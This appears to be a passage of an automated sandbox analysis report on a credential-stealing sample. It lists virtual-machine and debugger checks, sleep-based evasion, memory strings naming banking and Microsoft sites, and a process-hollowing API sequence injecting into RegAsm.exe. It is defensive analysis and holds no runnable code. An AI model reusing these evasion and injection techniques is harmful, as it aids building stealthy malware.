                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2352, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0030129022_2_00301290
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0030128022_2_00301280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\inject.exeMemory allocated: 2590000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeMemory allocated: 27F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 5000000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7731Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2025Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6553
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3179
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeAPI coverage: 5.4 %
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeAPI coverage: 8.8 %
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0030128022_2_00301280
                  Source: C:\Users\user\Desktop\inject.exe TID: 6984Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3180Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe TID: 1868Thread sleep time: -40000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep count: 6553 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2292Thread sleep count: 3179 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4592Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,5_2_004031DC
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,5_2_0040367D
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_00317978 FindFirstFileW,FindFirstFileW,free,9_2_00317978
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0030A151 FindFirstFileExW,22_2_0030A151
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0031881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,9_2_0031881C
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0031B5E0 GetSystemInfo,9_2_0031B5E0
                  Source: C:\Users\user\Desktop\inject.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeThread delayed: delay time: 40000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmwaretrat
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxservice
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: Installer.exe, 00000016.00000002.2283720664.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000016.00000002.2283720664.0000000000E80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmwareuser
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: RegAsm.exe, 00000003.00000002.2238103490.0000000005A39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: Installer.exe, 00000016.00000002.2283720664.0000000000E58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: Installer.exe, 00000016.00000002.2283720664.0000000000E30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: RegSvcs.exe, 00000017.00000002.2334895833.00000000012F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: Installer.exe, 00000016.00000002.2282337473.000000000031C000.00000004.00000001.01000000.0000000D.sdmp, Installer.exe, 00000016.00000003.2281553518.0000000003542000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2334616398.0000000000402000.00000020.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxtray
                  Source: Installer.exe, 00000016.00000002.2283720664.0000000000E58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmtoolsd
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: RegAsm.exe, 00000003.00000002.2228687416.00000000044F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: RegAsm.exe, 00000003.00000002.2216914083.000000000327B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CF8B90 LdrInitializeThunk,3_2_06CF8B90
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_003020FF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_003020FF
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,5_2_00402665
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0030B52D mov eax, dword ptr fs:[00000030h]22_2_0030B52D
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_00306B54 mov eax, dword ptr fs:[00000030h]22_2_00306B54
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0030BFD4 GetProcessHeap,22_2_0030BFD4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_003020FF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_003020FF
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_00302262 SetUnhandledExceptionFilter,22_2_00302262
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_00305E89 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00305E89
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_00302375 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00302375
                  Source: C:\Users\user\Desktop\inject.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\inject.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\inject.exeCode function: 0_2_027F2139 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_027F2139
